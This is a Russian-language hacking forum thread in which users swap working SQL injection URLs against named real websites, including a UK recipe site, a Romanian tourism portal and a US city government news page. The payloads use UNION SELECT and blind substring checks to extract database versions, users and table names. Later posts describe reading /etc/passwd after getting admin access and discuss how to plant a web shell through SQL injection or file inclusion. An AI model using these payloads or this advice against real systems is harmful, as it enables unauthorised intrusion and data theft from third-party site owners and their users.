Мде А мне кажется пятая http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+and+substring(version(),1,1)=5--+ +++AndreyDevil+++ Там двойной запрос а вторая отлично перебирается, просто кавычку нужно ставить http://www.higherhacknell.co.uk/recipes.php?id=-1'+union+select+1,2,concat_ws(0x3a,User(),Database(),Version()),4,5,6,7,8,9,0,11/*
jokester спасибо) не заметил... да там вижу нифига не получится.. а второй? хз... думаю тоже не выйдет
http://www.turisminromania.ro/evenimente~BUCURESTI~detalii~Concert-Ace-Of-Base~23+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64.html Великий Jokester помоги, вроде вывод есть а не выводит.Спасибо заранее.
Всё, что больше одного символа, при попытке подставить значение (хоть 11 вместо 1) - вызывает ошибку. Пока только так вижу: http://www.turisminromania.ro/evenimente~BUCURESTI~detalii~Concert-Ace-Of-Base~23+and+substring(version(),1,1)=5.html
Там рядом полноценная инъекция... Code: http://www.turisminromania.ro/index.php?judet=10+and+1=0+union+select+1,version(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49--
thanks to R1dex , разобрался надо спать больше, зациклился на одном и бошка дальше не думает...всем спасибо и спокойной ночи
Не в поле дело , а в общей длинне строки И эта ничем не хуже, просто ненужное надо убрать http://www.turisminromania.ro/evenimente~BUCURESTI~detalii~Concert-Ace-Of-Base~2+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+information_schema.tables.html
гы, точняк. Просто с такого кол-ва полей неплохо экономица за счет урезания по одному символу с каждого числа. Риспект.
что тут у нас такое? http://prescott-az.gov/news/index.php?id=1468+order+by+12/* - 12 типа.. http://prescott-az.gov/news/index.php?id=1468+union+select+1,2,3,4,5,6,7,8,9,10,11,12/* а не работает...
Нету вывода.Юзай как слепую. Code: http://prescott-az.gov/news/index.php?id=1468+and+substring(version(),1,1)=4/*
Ситуация. Получил доступ в админку, через аплоад картинок (другого нет) заливаю шелл (допустим shell.php). Скрипт меняет название шелла и расширение, на что то типа uploadimage.gif?3451 когда обращаешься к этой картинке-в браузере показывается код шелла.Как получить нормальный шелл? Доступ в админку получил через скулю, файл прив пашет, могу прочитать /etc/passwd и ещё несколько.Но не знаю папку с правами на запись, поэтому через скулю залить шелл не могу. Выручайте!
Как понять "не знаю папку на запись" ? Лей в ту папку, куда из админки заливается твоя картинка, права должны быть
Так что ты хочешь услышать? Если скрипт меняет расширение файла при заливке, то ничего ты тут не сделаешь. Ищи папку на запись, и лей через скуль. Или ищи инклуд, и инклудь свой шелл
Возможно картинка хранится в базе, а не в файловом варианте. И 3451 некий айди картинки вытаскивающий и показывающий ее. Второй вариант - от картинки обрезается расширение и настоящее имя ее вроде 3451.jpg ... Ну или много еще чего. Слишком размывчато все описал.
